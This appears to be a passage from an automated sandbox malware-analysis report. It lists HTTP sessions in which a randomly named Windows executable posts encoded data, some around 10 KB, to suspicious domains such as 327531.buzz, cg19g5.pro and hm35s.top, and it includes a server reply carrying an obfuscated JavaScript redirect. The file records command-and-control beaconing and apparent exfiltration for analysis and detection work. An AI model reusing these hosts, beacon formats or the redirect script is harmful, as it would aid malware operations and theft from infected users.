                                                                                                            Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                            Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                                            Dec 12, 2024 21:48:14.890084028 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.44982943.199.54.158805728C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 21:48:30.473103046 CET766OUTPOST /iodk/ HTTP/1.1
                                                                                                            Host: www.327531.buzz
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.327531.buzz
                                                                                                            Referer: http://www.327531.buzz/iodk/
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 203
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                                                                                                            Data Raw: 59 64 44 54 6e 68 3d 51 6b 75 75 35 31 62 6d 2b 4a 4a 32 75 6f 34 51 69 45 6e 68 59 75 32 49 69 79 53 33 59 47 69 2f 56 55 67 69 39 58 4e 66 6d 70 63 43 59 67 4e 32 67 4a 55 72 4f 54 35 4d 39 43 73 64 58 55 64 64 57 45 38 4f 54 74 44 35 38 43 76 41 2f 56 2b 32 6d 57 33 6b 75 6b 63 72 56 43 71 57 77 67 43 35 5a 6c 43 58 41 38 5a 4e 4f 57 6b 67 6b 6f 2f 51 34 54 63 58 66 62 61 44 61 32 46 47 38 4f 76 77 56 74 77 50 70 67 4b 46 2b 4a 69 51 2b 50 54 77 2f 4d 32 79 61 73 39 61 46 4b 37 74 2b 52 6a 4a 5a 47 52 61 39 66 55 33 49 47 77 44 48 4e 55 38 34 6b 36 7a 48 39 6b 75 35 62 69 51 49 50 75 44 4c 51 3d 3d
                                                                                                            Data Ascii: YdDTnh=Qkuu51bm+JJ2uo4QiEnhYu2IiyS3YGi/VUgi9XNfmpcCYgN2gJUrOT5M9CsdXUddWE8OTtD58CvA/V+2mW3kukcrVCqWwgC5ZlCXA8ZNOWkgko/Q4TcXfbaDa2FG8OvwVtwPpgKF+JiQ+PTw/M2yas9aFK7t+RjJZGRa9fU3IGwDHNU84k6zH9ku5biQIPuDLQ==


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            2192.168.2.44983543.199.54.158805728C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 21:48:33.129990101 CET786OUTPOST /iodk/ HTTP/1.1
                                                                                                            Host: www.327531.buzz
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.327531.buzz
                                                                                                            Referer: http://www.327531.buzz/iodk/
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 223
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                                                                                                            Data Raw: 59 64 44 54 6e 68 3d 51 6b 75 75 35 31 62 6d 2b 4a 4a 32 76 49 6f 51 78 56 6e 68 49 2b 32 50 6e 79 53 33 54 6d 69 37 56 55 38 69 39 57 35 50 6d 62 34 43 59 44 5a 32 76 6f 55 72 4a 54 35 4d 7a 69 73 63 54 55 64 4b 57 45 41 73 54 6f 37 35 38 43 72 41 2f 51 43 32 6d 6c 66 72 74 55 63 70 4f 53 71 51 2f 41 43 35 5a 6c 43 58 41 34 77 71 4f 57 63 67 6b 59 76 51 35 79 63 59 58 37 61 43 4e 47 46 47 34 4f 76 30 56 74 77 58 70 68 57 76 2b 50 6d 51 2b 4b 33 77 2b 5a 43 78 41 38 39 59 61 61 37 2b 34 53 2b 48 63 33 31 52 77 2b 51 31 48 6b 67 6d 50 72 5a 6d 70 56 62 6b 56 39 41 64 6b 63 72 6b 46 4d 54 4b 51 64 47 68 59 52 59 54 4c 2b 50 2b 45 32 33 4e 34 75 78 78 39 56 30 3d
                                                                                                            Data Ascii: YdDTnh=Qkuu51bm+JJ2vIoQxVnhI+2PnyS3Tmi7VU8i9W5Pmb4CYDZ2voUrJT5MziscTUdKWEAsTo758CrA/QC2mlfrtUcpOSqQ/AC5ZlCXA4wqOWcgkYvQ5ycYX7aCNGFG4Ov0VtwXphWv+PmQ+K3w+ZCxA89Yaa7+4S+Hc31Rw+Q1HkgmPrZmpVbkV9AdkcrkFMTKQdGhYRYTL+P+E23N4uxx9V0=


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            3192.168.2.44984143.199.54.158805728C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 21:48:35.793745041 CET10868OUTPOST /iodk/ HTTP/1.1
                                                                                                            Host: www.327531.buzz
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.327531.buzz
                                                                                                            Referer: http://www.327531.buzz/iodk/
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 10303
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                                                                                                            Data Raw: 59 64 44 54 6e 68 3d 51 6b 75 75 35 31 62 6d 2b 4a 4a 32 76 49 6f 51 78 56 6e 68 49 2b 32 50 6e 79 53 33 54 6d 69 37 56 55 38 69 39 57 35 50 6d 62 77 43 62 7a 46 32 75 4c 4d 72 49 54 35 4d 74 79 73 5a 54 55 64 79 57 41 55 6f 54 6f 2b 4d 38 42 44 41 74 43 61 32 78 6b 66 72 32 6b 63 70 48 79 71 56 77 67 43 57 5a 6c 53 62 41 38 73 71 4f 57 63 67 6b 64 72 51 6f 6a 63 59 56 37 61 44 61 32 46 4b 38 4f 75 54 56 74 6f 48 70 68 53 56 2f 38 75 51 2f 71 6e 77 38 76 65 78 59 73 39 47 62 61 36 6a 34 53 79 4d 63 33 6f 6f 77 2b 6b 62 48 6d 38 6d 4c 4f 30 67 78 6e 6d 37 4c 37 4d 68 39 37 33 59 49 2f 76 47 65 63 75 67 58 42 38 50 58 74 2f 70 4a 42 53 6e 70 76 35 70 73 51 37 6d 6c 49 72 4e 36 4d 67 38 39 71 6e 61 53 4a 72 64 69 65 42 42 32 36 4e 30 45 63 7a 77 76 6d 51 4e 66 65 30 6d 7a 31 48 36 75 6a 35 75 30 79 37 55 33 5a 62 63 78 61 6a 4f 38 36 4d 43 45 30 47 71 65 30 6b 70 7a 2f 52 42 48 46 39 4d 6e 53 67 53 34 57 4b 6e 31 52 65 36 31 59 7a 33 47 4e 2b 47 70 70 58 45 61 6b 44 69 4b 47 44 7a 69 77 77 53 65 69 32 [TRUNCATED]
                                                                                                            Data Ascii: YdDTnh=Qkuu51bm+JJ2vIoQxVnhI+2PnyS3Tmi7VU8i9W5PmbwCbzF2uLMrIT5MtysZTUdyWAUoTo+M8BDAtCa2xkfr2kcpHyqVwgCWZlSbA8sqOWcgkdrQojcYV7aDa2FK8OuTVtoHphSV/8uQ/qnw8vexYs9Gba6j4SyMc3oow+kbHm8mLO0gxnm7L7Mh973YI/vGecugXB8PXt/pJBSnpv5psQ7mlIrN6Mg89qnaSJrdieBB26N0EczwvmQNfe0mz1H6uj5u0y7U3ZbcxajO86MCE0Gqe0kpz/RBHF9MnSgS4WKn1Re61Yz3GN+GppXEakDiKGDziwwSei2BN3qo5cabojxm0pY3n166YDWY9OSaDd8HXm7IWHU628Ij0sHMJp36hlI2hLssUvODTxl5dVOx07FPJlL24rhzVH39KT5CeXMl2neS53PTQ4zj+K0sQmSWbMdQ07O+RXcveiezMcY6t/hzJkahOK9m9CSs+Cw90AQyMLahqyzoTq7FxmlkVxkt9dNNDBnWE/qImPlcn5ZgYbtk14EyrEY8grp7aSLDbHT2MUmFOtQdDwisHuxsmesRmdjZC1/V1nUto7q271iLJ8dpJ73l68NXeZ/2OgJ7lS2KeYSYXO8PFyVtvIWykmk+WzzYo1XPm+LF8pmv4hswlnACjSwup1WNb2mTKjM3bJWI7U/lybBs26xcmVKLTk7tjOGinEk02U2Wtr2rBwgf1ScEIErm8qjrjm+WDXohXH63SDyH2rht6gQnPNQaJCBkpJD4nUUnxO+STqlCP1RpN59Jfc/5D3TC3+8ceDgvw109a21Je83iUCxrE2rJ0nUsVHRH7HScAwvdKNwZVhtIv0jCY0DoTQTTpKvEn5j0PwH9FjlpdkdXCmt/UzdnZKI0J6mUxY876fFweLwxe6dolm6hKojO9oC23Xh49gASmdKkPbcY3vos3XuJw27JHBel6vs0pXUvLjHy75yVL+CdTDiDh0VXLpBeAkWasRK4FptuB [TRUNCATED]


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            4192.168.2.44985243.199.54.158805728C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 21:48:38.456708908 CET508OUTGET /iodk/?YdDTnh=dmGO6CepyY0nvsEaxU7IYLSZuGbeWFuYSER1oXhei8AaXzs2ne8+dyZVwWklDlgafwdROfr4xQPj+g6hlFS8zW1LJxia/FKHRGC6CNVENRR1k9XuyS8IPZU=&-n-l=OFJhRZgx2zhDqHF HTTP/1.1
                                                                                                            Host: www.327531.buzz
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            5192.168.2.449913154.88.22.105805728C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 21:49:05.950001955 CET763OUTPOST /63n1/ HTTP/1.1
                                                                                                            Host: www.cg19g5.pro
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.cg19g5.pro
                                                                                                            Referer: http://www.cg19g5.pro/63n1/
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 203
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                                                                                                            Data Raw: 59 64 44 54 6e 68 3d 39 7a 69 76 33 2f 7a 76 42 31 42 74 66 45 44 51 6d 44 2b 72 6e 57 53 41 66 67 30 50 64 68 64 2f 43 64 6f 37 55 7a 4b 48 4a 33 44 46 4a 38 41 2b 78 64 37 75 45 6d 4e 57 6b 55 74 4c 4b 32 7a 66 32 79 30 4b 75 4f 6b 4d 5a 43 73 61 2f 50 74 55 41 30 77 62 73 38 79 53 48 6d 67 4d 59 43 48 73 36 35 71 50 78 56 76 62 79 59 5a 67 34 45 70 78 7a 34 37 4f 37 79 2b 4c 2b 6d 77 61 4b 73 30 57 57 6b 65 70 32 76 49 71 2b 67 75 5a 4b 54 74 34 74 55 6b 6b 73 76 6c 48 43 56 7a 56 79 6a 77 4d 79 2f 66 72 58 2b 2f 59 69 47 68 6d 64 53 4c 48 6d 44 38 53 2f 4f 2b 41 4e 78 4c 4a 34 4b 4c 44 69 41 3d 3d
                                                                                                            Data Ascii: YdDTnh=9ziv3/zvB1BtfEDQmD+rnWSAfg0Pdhd/Cdo7UzKHJ3DFJ8A+xd7uEmNWkUtLK2zf2y0KuOkMZCsa/PtUA0wbs8ySHmgMYCHs65qPxVvbyYZg4Epxz47O7y+L+mwaKs0WWkep2vIq+guZKTt4tUkksvlHCVzVyjwMy/frX+/YiGhmdSLHmD8S/O+ANxLJ4KLDiA==
                                                                                                            Dec 12, 2024 21:49:07.463759899 CET364INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Thu, 12 Dec 2024 20:49:07 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Content-Encoding: gzip
                                                                                                            Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 96 d9 91 55 9e 15 3e b9 7e 79 be e1 16 46 89 ce a6 e5 c9 b9 16 66 7e 59 91 26 fe 81 b6 b6 ea 9a 36 fa 50 13 01 5f 1c 4f cf 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 67)N.,(ON,VPV/Ji%IAf>U>~yFf~Y&6P_OZ0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            6192.168.2.449923154.88.22.105805728C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 21:49:08.616202116 CET783OUTPOST /63n1/ HTTP/1.1
                                                                                                            Host: www.cg19g5.pro
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.cg19g5.pro
                                                                                                            Referer: http://www.cg19g5.pro/63n1/
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 223
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                                                                                                            Data Raw: 59 64 44 54 6e 68 3d 39 7a 69 76 33 2f 7a 76 42 31 42 74 65 6b 7a 51 6b 67 6d 72 6c 32 53 50 51 41 30 50 58 42 64 6a 43 64 73 37 55 78 6e 61 4b 43 54 46 4b 64 77 2b 77 59 62 75 48 6d 4e 57 73 30 74 4f 45 57 7a 41 32 31 39 31 75 4c 45 4d 5a 43 49 61 2f 4b 52 55 41 6e 49 63 74 73 79 51 50 47 67 4f 56 69 48 73 36 35 71 50 78 56 37 39 79 59 42 67 34 30 35 78 7a 5a 37 4e 7a 53 2b 55 39 6d 77 61 4f 73 30 53 57 6b 66 4d 32 75 6b 4d 2b 69 6d 5a 4b 54 64 34 74 68 45 6c 6d 76 6c 46 66 46 7a 4c 37 7a 51 46 37 76 53 6f 63 74 72 64 74 58 6c 53 63 55 47 64 33 79 64 46 74 4f 61 7a 51 32 43 39 31 4a 32 4b 35 4d 50 44 49 52 53 57 51 44 63 65 73 34 54 39 5a 4d 68 74 34 41 67 3d
                                                                                                            Data Ascii: YdDTnh=9ziv3/zvB1BtekzQkgmrl2SPQA0PXBdjCds7UxnaKCTFKdw+wYbuHmNWs0tOEWzA2191uLEMZCIa/KRUAnIctsyQPGgOViHs65qPxV79yYBg405xzZ7NzS+U9mwaOs0SWkfM2ukM+imZKTd4thElmvlFfFzL7zQF7vSoctrdtXlScUGd3ydFtOazQ2C91J2K5MPDIRSWQDces4T9ZMht4Ag=
                                                                                                            Dec 12, 2024 21:49:10.154843092 CET364INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Thu, 12 Dec 2024 20:49:09 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Content-Encoding: gzip
                                                                                                            Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 96 d9 91 55 9e 15 3e b9 7e 79 be e1 16 46 89 ce a6 e5 c9 b9 16 66 7e 59 91 26 fe 81 b6 b6 ea 9a 36 fa 50 13 01 5f 1c 4f cf 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 67)N.,(ON,VPV/Ji%IAf>U>~yFf~Y&6P_OZ0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            7192.168.2.449930154.88.22.105805728C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 21:49:11.309892893 CET10865OUTPOST /63n1/ HTTP/1.1
                                                                                                            Host: www.cg19g5.pro
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.cg19g5.pro
                                                                                                            Referer: http://www.cg19g5.pro/63n1/
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 10303
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                                                                                                            Data Raw: 59 64 44 54 6e 68 3d 39 7a 69 76 33 2f 7a 76 42 31 42 74 65 6b 7a 51 6b 67 6d 72 6c 32 53 50 51 41 30 50 58 42 64 6a 43 64 73 37 55 78 6e 61 4b 43 62 46 4b 72 6b 2b 78 35 62 75 4a 47 4e 57 7a 45 74 50 45 57 79 63 32 30 5a 78 75 4c 49 44 5a 41 41 61 74 59 4a 55 56 6d 49 63 6a 73 79 51 4e 47 67 4e 59 43 48 35 36 35 36 4c 78 56 72 39 79 59 42 67 34 32 78 78 31 49 37 4e 31 53 2b 4c 2b 6d 77 57 4b 73 31 48 57 6b 47 78 32 75 67 44 2b 53 47 5a 4a 33 78 34 76 79 73 6c 6b 50 6c 44 63 46 79 59 37 7a 64 64 37 76 65 43 63 73 76 33 74 58 52 53 65 52 76 4a 73 43 56 4a 78 63 66 76 53 30 79 66 31 59 53 39 30 74 36 2f 48 77 61 38 4b 43 31 39 6f 4b 36 31 41 2b 35 74 6c 6b 66 53 47 46 66 50 44 65 4b 39 69 71 62 63 6b 6b 78 78 41 74 4f 61 7a 70 41 41 36 56 49 49 33 66 72 39 61 65 7a 74 4c 66 70 79 68 75 37 6a 76 31 64 72 45 70 72 4c 76 7a 73 4a 77 52 79 74 4b 4a 46 63 4c 64 4f 52 46 76 43 6a 52 57 61 30 79 39 4a 73 30 6a 78 6c 41 59 6c 53 2b 2f 54 6d 43 68 6f 42 6f 4a 66 59 2f 59 32 52 62 79 4c 4d 56 38 64 42 7a 58 63 [TRUNCATED]
                                                                                                            Data Ascii: YdDTnh=9ziv3/zvB1BtekzQkgmrl2SPQA0PXBdjCds7UxnaKCbFKrk+x5buJGNWzEtPEWyc20ZxuLIDZAAatYJUVmIcjsyQNGgNYCH5656LxVr9yYBg42xx1I7N1S+L+mwWKs1HWkGx2ugD+SGZJ3x4vyslkPlDcFyY7zdd7veCcsv3tXRSeRvJsCVJxcfvS0yf1YS90t6/Hwa8KC19oK61A+5tlkfSGFfPDeK9iqbckkxxAtOazpAA6VII3fr9aeztLfpyhu7jv1drEprLvzsJwRytKJFcLdORFvCjRWa0y9Js0jxlAYlS+/TmChoBoJfY/Y2RbyLMV8dBzXcfIG/0YIdLqYkaE8QIiRekzmrpnbxMv0qVOEUi/QFzCefGmS/gcZL4isUhnwt07jBe7/atWqkASO0zpVZmkMyHTYOt1h6mzLr276KZw9TrhtvfPZS1CEXW6A5XITnZaAILcyC4b42asbg+bG/QnnXIX/NIBEz4ED8o2A8KePOtdwIpNazxm+bdiH44Z8Z0sdNYQSE/uX0RoF1LSuVumIR8dMhAVoZUX4u4gn1Vvt+peTI5gwmlYi6I6hXSfc8JMyoPScuOlFc55gZBN0+8vYP63yc0HBsNrFBD3Il/2srfcAXkn/tLT6Woj2aO+yuFCi2H1DNMpgf+c3XFyyXy9b6ddrmcINvj5Do+LdG01ovS8qoXM7wbQ6amNrgTctQaMjXwWuz3v/h944PjvaclcMA1BiDOluAcC15bOuvGaxtgwzLU5hk5McqbkjdxHkVQtpY5CIsTO/8CMUCGpb3chZOMWfEui3A5fw0jipQzYIUNC5H/ZNJ1rM+5ua0WRn1C7aJTl7fLTZmugLWh8EeflzxbrDxUViFCiWpcJsm5iXGkWvMkvCEpJcofPU4XqUlvoyYNOZeuZzXeEWaM7I/EpbFd45mq5/pq9jH5dzrXfio6tubH2yJ/2WwsG/z1auiX/fvDx2dUmR/ErBoYRqjumC5ZIjAigPXQ9xwBl [TRUNCATED]
                                                                                                            Dec 12, 2024 21:49:12.800817013 CET364INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Thu, 12 Dec 2024 20:49:12 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Content-Encoding: gzip
                                                                                                            Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 96 d9 91 55 9e 15 3e b9 7e 79 be e1 16 46 89 ce a6 e5 c9 b9 16 66 7e 59 91 26 fe 81 b6 b6 ea 9a 36 fa 50 13 01 5f 1c 4f cf 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 67)N.,(ON,VPV/Ji%IAf>U>~yFf~Y&6P_OZ0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            8192.168.2.449936154.88.22.105805728C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 21:49:14.031729937 CET507OUTGET /63n1/?-n-l=OFJhRZgx2zhDqHF&YdDTnh=wxKP0Ki1Kkw6YH74oBqG30+iQCgiXWBSdqxOdzuCPyveB98x1djFf0ZtvUhWTFSc0EIYzppqTCA/sqplXndAssyXGlxUbFrZ1byk2GCNxKon0UhL377cjTQ= HTTP/1.1
                                                                                                            Host: www.cg19g5.pro
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                                                                                                            Dec 12, 2024 21:49:15.561419964 CET332INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Thu, 12 Dec 2024 20:49:15 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Vary: Accept-Encoding
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Data Raw: 34 65 0d 0a 3c 73 63 72 69 70 74 3e 6c 6f 63 61 74 69 6f 6e 5b 27 68 27 2b 27 72 65 27 2b 27 66 27 5d 20 3d 20 61 74 6f 62 28 27 61 48 52 30 63 48 4d 36 4c 79 39 6b 59 7a 49 78 4c 6d 4e 6e 4d 57 38 32 61 43 35 77 63 6d 38 36 4e 6a 59 34 4f 51 3d 0d 0a 63 0d 0a 3d 27 29 3c 2f 73 63 72 69 70 74 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 4e<script>location['h'+'re'+'f'] = atob('aHR0cHM6Ly9kYzIxLmNnMW82aC5wcm86NjY4OQ=c=')</script>0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            9192.168.2.449952154.23.184.95805728C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 21:49:21.185236931 CET760OUTPOST /ebw6/ HTTP/1.1
                                                                                                            Host: www.hm35s.top
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Origin: http://www.hm35s.top
                                                                                                            Referer: http://www.hm35s.top/ebw6/
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Length: 203
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                                                                                                            Data Raw: 59 64 44 54 6e 68 3d 74 35 69 74 4d 39 49 58 6a 6c 51 48 50 54 77 5a 2f 6a 33 6b 6b 49 78 4b 41 36 6a 4c 45 36 38 78 72 70 39 4e 44 7a 4d 69 47 48 67 4c 75 2b 74 6a 78 71 46 54 41 73 2f 71 72 49 47 62 4a 6b 45 71 32 4a 50 33 74 48 2b 36 4e 35 70 4c 6d 68 6b 64 4c 31 4f 56 4a 72 48 58 4e 71 51 4d 50 6e 54 42 34 4d 51 51 6f 4c 30 46 42 67 57 38 53 4b 31 38 4b 4b 59 72 71 72 34 6d 30 35 53 57 6e 36 59 48 46 55 59 51 4d 77 37 38 2b 2b 67 44 47 55 42 34 51 52 4e 32 53 74 51 4c 6e 6d 66 50 61 66 4b 39 53 4b 34 49 42 74 30 6d 68 74 4b 31 45 48 76 50 71 45 31 62 57 7a 42 51 76 75 69 6b 33 33 36 68 46 67 3d 3d
